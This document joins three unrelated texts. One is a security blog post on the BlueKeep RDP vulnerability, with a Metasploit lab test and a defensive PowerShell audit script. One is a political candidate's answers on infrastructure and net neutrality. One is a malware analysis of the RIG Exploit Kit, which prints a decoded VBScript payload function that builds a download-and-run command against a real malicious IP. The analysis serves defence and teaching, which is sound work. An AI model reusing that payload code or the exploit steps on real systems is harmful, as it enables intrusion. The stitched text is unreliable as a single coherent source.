Keeping your Business Protected from CVE-2019-0708 (aka Bluekeep)

Following the recent Metasploit exploit community release, we’ve been busy this weekend in the lab testing the exploit against our vulnerable sandpit. You can see from the screenshot below that we were able to load the new module and successfully gain shell access on a vulnerable host in our test environment.

Following successful exploitation of the vulnerable machine (unpatched, with RDP enabled and allowed through the Windows Firewall), we then proceeded to deploy SentinelOne.

Live Wild Exploitation

We have observed in-the-wild attempts to both identify and exploit vulnerable hosts. When you couple this with the various ‘commercial’ options available (MSF, Immunity CANVAS), it becomes that much more critical that organizations continue to take action to protect themselves against this attack vector.

CVE-2019-0708 Background

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

“A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

In essence, this is a remote code execution vulnerability that affects legacy Windows operating systems and, in certain situations, requires no authentication. This makes the vulnerability incredibly dangerous.

On top of that, Rapid7 has just announced that a community-developed exploit has been made public as part of a Metasploit Framework (a security testing framework) pull request. This is in addition to Immunity’s commercial option in CANVAS, released in July 2019.

This exploit is currently not merged into the main branch of Metasploit; however, we expect it will be in the near future.

Vulnerable Hosts

Using BinaryEdge we can see over 1 million potentially vulnerable hosts still on the Internet, despite a patch being released in May 2019.

Note: The quantity of exposed and vulnerable hosts can vary depending on the type of scan and the services used for the query, but by all accounts the number is between ~500k and ~1.2 million.

MS Recommended Mitigations

MS Recommended Workarounds

This may come as no surprise, but enabling Network Level Authentication (NLA) will prevent the exploit from working from an unauthenticated perspective.

Keeping your business protected

It is important to understand a few things about this vulnerability, the attack pattern and the mitigations. For the machines to be vulnerable in this instance, the exposed machines must have a fairly relaxed security posture/configuration:

  • RDP must be enabled without NLA (never recommended, but we often see this in the wild)
  • The service must be enabled and exposed from a network perspective (we can see over 1 million vulnerable servers on the Internet at the time of writing)
  • The vulnerability is known and a patch is available, so there must also be a failing in the patch management and vulnerability management process surrounding this service/asset

With this in mind, however, we can show how having additional protective controls can greatly enhance even a “weak” security configuration.

In our test environment we deployed SentinelOne (EDR) to the device, leaving the machine unpatched and without NLA enabled. We once again attempted to shell the device using the MSF module:

We can see here that no connection was established and that SentinelOne blocked the threat.

Watch the Demo

Here we can see the alerts in the SentinelOne console. We drill down further into the alert:

In a real scenario we would now take further action: patching the vulnerable system, hardening the configuration, and also attempting to identify the threat actor, and finally we would advise. For the lab, we aren’t going to go into that level of detail (I already know who launched the attack!)

Summary

Whilst the exploit release isn’t highly mature (it can BSOD a box, and it requires an understanding of the target in terms of architecture and environment, e.g. the hypervisor, in order to gain a shell), you can still see it’s highly effective when targeted against a Windows 7 SP1 machine that has a weak security configuration. You can take a range of measures to improve the posture of the machine, which may include:

  • Disable RDP if it is not required
  • Deploy a more secure configuration (e.g. enable NLA)
  • Note that if a low-privileged user account is compromised it may still be possible to use this exploit to gain SYSTEM-level access even if NLA is enabled
  • Only allow RDP from whitelisted admin subnets
  • Ensure systems are patched
  • Run regular vulnerability scans of your network and endpoints
  • Ensure systems have adequate protection and response capabilities (such as SentinelOne)
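To turn the three preconditions listed under “Keeping your business protected” and the workarounds in this summary into something you can run on a host, here is an added PowerShell audit script; it is not code from the original post or from SentinelOne. The KB list, the admin subnet and the switch names are assumptions (check the KB IDs against the MSRC advisory linked above before relying on them).

```powershell
<#
  Added example, not code from the original post or from SentinelOne.
  Audits the local host for the three preconditions the post lists for CVE-2019-0708
  (RDP on without NLA, reachable through the firewall, affected OS without the fix) and,
  with -RequireNla / -RestrictScope, applies the two workarounds from the summary.
  Run from an elevated PowerShell prompt on the host being checked.
#>
[CmdletBinding()]
param(
    # KB IDs that shipped the May 2019 fix for the affected platforms. Check them against
    # the MSRC advisory linked above; later monthly rollups supersede them, so "not seen"
    # means "verify with your patch-management tooling", not "definitely unpatched".
    [string[]]$FixKBs = @('KB4499175', 'KB4499164', 'KB4499180', 'KB4499149', 'KB4500331'),
    # Assumed admin subnet for -RestrictScope; replace with your own management network.
    [string]$AdminSubnet = '10.0.0.0/24',
    [switch]$RequireNla,
    [switch]$RestrictScope
)

$tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpKey = "$tsKey\WinStations\RDP-Tcp"
$NET_FW_RULE_DIR_IN     = 1   # INetFwRule.Direction value for inbound rules
$NET_FW_IP_PROTOCOL_TCP = 6

function Get-RdpFirewallRules {
    param([int]$Port)
    # HNetCfg.FwPolicy2 exists on Vista/2008 and later; Get-NetFirewallRule needs 8/2012+.
    $policy = New-Object -ComObject HNetCfg.FwPolicy2
    $policy.Rules | Where-Object {
        $_.Enabled -and $_.Direction -eq $NET_FW_RULE_DIR_IN -and
        $_.Protocol -eq $NET_FW_IP_PROTOCOL_TCP -and $_.LocalPorts -eq "$Port"
    }
}

function Get-BlueKeepPosture {
    $os = Get-WmiObject Win32_OperatingSystem
    $major, $minor = $os.Version.Split('.')[0, 1] | ForEach-Object { [int]$_ }
    # Platforms the advisory lists as affected: XP/2003 (5.x), Vista/2008 (6.0), 7/2008 R2 (6.1).
    $affectedOS = ($major -lt 6) -or ($major -eq 6 -and $minor -le 1)

    $rdpEnabled = (Get-ItemProperty -Path $tsKey).fDenyTSConnections -eq 0
    $rdpTcp     = Get-ItemProperty -Path $rdpKey
    $nlaOn      = $rdpTcp.UserAuthentication -eq 1
    $port       = [int]$rdpTcp.PortNumber
    $fwRules    = @(Get-RdpFirewallRules -Port $port)
    # RemoteAddresses is '*' when a rule accepts connections from any remote address.
    $openToAny  = @($fwRules | Where-Object { $_.RemoteAddresses -eq '*' }).Count -gt 0
    $fixSeen    = @(Get-HotFix | Where-Object { $FixKBs -contains $_.HotFixID }).Count -gt 0

    New-Object PSObject -Property @{
        OS                = $os.Caption
        AffectedOS        = $affectedOS
        RdpEnabled        = $rdpEnabled
        RdpPort           = $port
        NlaRequired       = $nlaOn
        SecurityLayer     = $rdpTcp.SecurityLayer   # 0 = legacy RDP security, 1 = negotiate, 2 = TLS
        FirewallOpenToAny = $openToAny
        FirewallScopes    = @($fwRules | ForEach-Object { $_.RemoteAddresses })
        FixKBInstalled    = $fixSeen
        # The post's "weak configuration": affected OS, RDP on, no NLA, fix not seen.
        # NLA only closes the unauthenticated path; an authenticated low-privileged user
        # may still reach the bug, as the summary notes, so patching remains the real fix.
        ExposedToBlueKeep = ($affectedOS -and $rdpEnabled -and -not $nlaOn -and -not $fixSeen)
    }
}

$posture = Get-BlueKeepPosture
$posture | Format-List

if ($RequireNla -and -not $posture.NlaRequired) {
    # Same setting as the System Properties checkbox "Allow connections only from computers
    # running Remote Desktop with Network Level Authentication"; applies to new connections.
    Set-ItemProperty -Path $rdpKey -Name UserAuthentication -Value 1
    Write-Output 'NLA is now required on RDP-Tcp.'
}

if ($RestrictScope) {
    foreach ($rule in Get-RdpFirewallRules -Port $posture.RdpPort) {
        # Replace "any remote address" with the admin subnet on each inbound RDP rule.
        $rule.RemoteAddresses = $AdminSubnet
        Write-Output ("Rule '{0}' now accepts RDP only from {1}." -f $rule.Name, $AdminSubnet)
    }
}
```

The firewall check only matches rules whose local port is exactly the RDP port, so a rule covering a port range will not be reported, and Get-HotFix only lists updates installed through Windows Update or WUSA.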

If you need assistance ensuring your business is protected, please don’t hesitate to get in touch. Our team of highly trained security engineers are on hand to help you protect, detect and respond to emerging threats!

A guest post by Daniel Card, Head of Cyber Security Services PSTG.


To help provide jobs to displaced workers and drive economic growth in communities that suffer negative effects from automation, I have proposed a $2 trillion infrastructure plan that would create an infrastructure bank to facilitate state and local government investment, increase the Highway Trust Fund, create a Climate Infrastructure Fund, and create five new matching funds to support water infrastructure, school infrastructure, deferred maintenance projects, rural broadband, and infrastructure projects in disadvantaged communities in urban and rural areas. In addition, my proposed national service program will create new opportunities that allow young adults to learn new skills and gain valuable work experience. For example, my proposal includes a new national infrastructure apprenticeship program that will award a professional certificate proving mastery of particular skill sets for those who complete the program.

10. What steps will you take to restore net neutrality and assure internet users that their traffic and data are safe from manipulation by broadband providers?

I support the Save Net Neutrality Act to restore net neutrality, and I will appoint FCC commissioners who are committed to maintaining a fair and open internet. Additionally, I would work with Congress to update our digital privacy laws and regulations to protect consumers, especially children, from their data being collected without consent.

RIG Exploit Kit Chain Internals

The Zero2Hero malware course continues with Vitali Kremez explaining the RIG Exploit Kit and the infection chain internals that led to the Amadey Stealer and Clipboard Hijacker.

Summary

One of the most active malware distribution vectors lately remains exploit kits delivered via drive-by infections. Exploit kits (EKs) have various components, from landing-page filtering to serving the relevant browser exploit, with the end goal of downloading and running the malware of choice on the victim host.

Background

Exploit kits experienced their heyday in 2012-2014, from the Blackhole Exploit Kit to the Angler (XXX) Exploit Kit, before their eventual demise. In many cases, some of the most high-profile and sophisticated exploit kits disappeared due to significant law enforcement operations, which led to the arrest of the main developer behind Blackhole EK, operating under the alias “Paunch,” as well as the Lurk cybercrime group takedown with the supposed arrest of “JP Morgan” in Russia.

In 2019, exploit kits are not as popular and effective as they once were, possibly due to the lack of reliable exploit providers, a weak underground economy for browser exploits, and the lack of a professionalized approach to exploit development.

The recent exploit kits leverage known vulnerabilities for which proof-of-concept (PoC) code is openly available on various file sharing websites and platforms.

Some of the most popular remain the Fallout Exploit Kit and the RIG Exploit Kit, with monthly subscription prices ranging from $700 USD to $2,000 USD. The majority of the exploit kit clientele are Russian-speaking cybercrime malware distributors; moreover, the exploit kit administrators themselves routinely refuse to rent the EK to English-language speakers.

Reversing RIG Exploit Kit Infection Chain Internals Leading to “Amadey” Stealer & Clipboard Hijacker

This analysis covers the latest malvertising campaign leading to the RIG Exploit Kit (RigEK) serving the Amadey stealer and clipboard hijacker malware. The RigEK leverages a so-called “gate,” a simple website that redirects victim traffic to the eventual RigEK landing page, which ultimately leads to the malware deployment.

Reverse Engineering Steps:

(1) Obtain the RigEK traffic response from Fiddler.

(2) Debug the landing page by setting a breakpoint on the function return and copying the decoded exploit payload function.

(3) Observe the full decoded VBS code from RigEK’s CVE-2018-8174 function, which is almost an exact copy of the GitHub “CVE-2018-8174” page.

CVE-2018-8174 is also known as the “Windows VBScript Engine Remote Code Execution Vulnerability.” The exploit relies on the predictability of memory allocation to trigger an exploitable use-after-free (UAF) condition.

[Image: RigEK CVE-2018-8174 use-after-free exploit code]

(4) Observe the additional Flash exploit served, CVE-2018-4878 (also a UAF), compiled with the attacker path “C:UsersLAPTOPDesktopflash_exfl2;;MainExp.as” left in the binary.

[Image: RigEK Flash exploit (CVE-2018-4878)]

(5) Finally, observe the malware drop from the RigEK leveraging the exploit.

The CVE-2018-8174 exploit allows remote code execution and transfers control to the following decoded and beautified command, which downloads an encoded binary, decrypts it, and runs the malware.

The relevant function, shortened and decoded with the key cNNN9ka, is as follows:

Function getegeheteegegegege()
    strString = "http://188[.]225[.]38[.]230/?REDACTED=detonator&ZqRgBa=known&DfJxlEZfMVoIe=known&gbamqKD=criticized&euxSkuKQYdMrM=already&ykPInPSwC=everyone&ffhd3s=REDACTED&LICFHL=blackmail&HZVhikQO=known&REDACTED=known&CRaWMKEIj=strategy&QhEkGOZo=criticized&REDACTED=strategy&zjpIGBzNgKtU=golfer&t4gdfgf4=REDACTED&hyrfspovuyAMY=blackmail&REDACTED=referred&REDACTED"
    linkHex =""

    For i=1 To Len(strString)
        linkHex = linkHex + Hex(Asc(Mid(strString,i,1)))

    Next

    key = "cNNN9ka"

    linkHex2 =""
    For i=1 To Len(key)
        linkHex2 = linkHex2 + Hex(Asc(Mid(key,i,1)))
    Next

    slang = "22"
    sla = "20"
    nulla = "00000000"

    str = "E"+"" ... "+ linkHex2 + slang + sla + slang + linkHex + slang + sla + slang + "A4" + slang + nulla
End Function
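To turn the hex blob the function above builds back into something an analyst can triage, the following added example (not code from the original post) mirrors the VBScript encoding, Hex(Asc(c)) per character, and then decodes the blob and extracts the key and the download URL. The sample URL is a constructed placeholder; the prefix the original elides with "..." is not reproduced.

```python
"""Decode the hex-encoded command string built by RigEK's CVE-2018-8174 payload."""
import re

SLANG, SLA, NULLA = "22", "20", "00000000"  # '"', ' ', four NUL bytes, as in the VBS


def vbs_hex(s: str) -> str:
    """Mirror VBScript's Hex(Asc(c)) concatenation: uppercase, no zero-padding.
    Printable ASCII always yields two digits; control chars (< 0x10) would not."""
    return "".join(format(ord(c), "X") for c in s)


def build_blob(url: str, key: str) -> str:
    """Reproduce the layout of the `str` line (the elided "E..." prefix is dropped):
    key " " URL " " 0xA4 " NUL NUL NUL NUL"""
    return (vbs_hex(key) + SLANG + SLA + SLANG + vbs_hex(url)
            + SLANG + SLA + SLANG + "A4" + SLANG + NULLA)


def defang(url: str) -> str:
    """Render a URL safe to paste into a report (hxxp, bracketed dots)."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_blob(blob: str) -> dict:
    """Decode the hex blob and pull out the key and any URLs it carries."""
    if len(blob) % 2:
        # Hex() emits a single digit for bytes < 0x10, which breaks naive decoding.
        raise ValueError("odd-length hex: blob contains an unpadded control byte")
    text = bytes.fromhex(blob).decode("latin-1")  # 0xA4 is not ASCII; latin-1 keeps it
    # Split on the quote characters the VBS inserts, dropping separators and NUL padding.
    tokens = [t for t in text.split('"') if t.strip(" \x00")]
    urls = [t for t in tokens if re.match(r"https?://", t)]
    return {
        "key": tokens[0] if tokens else "",
        "urls": urls,
        "defanged": [defang(u) for u in urls],
    }


if __name__ == "__main__":
    # Constructed sample; the real campaign used the C2 listed in the IOCs below.
    sample = build_blob("http://203.0.113.5/?x=placeholder", "cNNN9ka")
    print(decode_blob(sample))
```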

Credit:

@nao_sec

Indicators of Compromise (IOCs):

Amadey Stealer (SHA-256): fdf7be93b386b9ed27785f605b9de023dc71e0b1b4ac5d34c60b076043083eb7

Clipboard Hijacker (SHA-256): 23367aa96d6969d17dfa01dde3dd9ce7436be7dbfb7c585c8ead2af926872fb7

RigEK Gate: bitcoinsmaker[.]site 

RigEK Server Landing: 188[.]225[.]38[.]230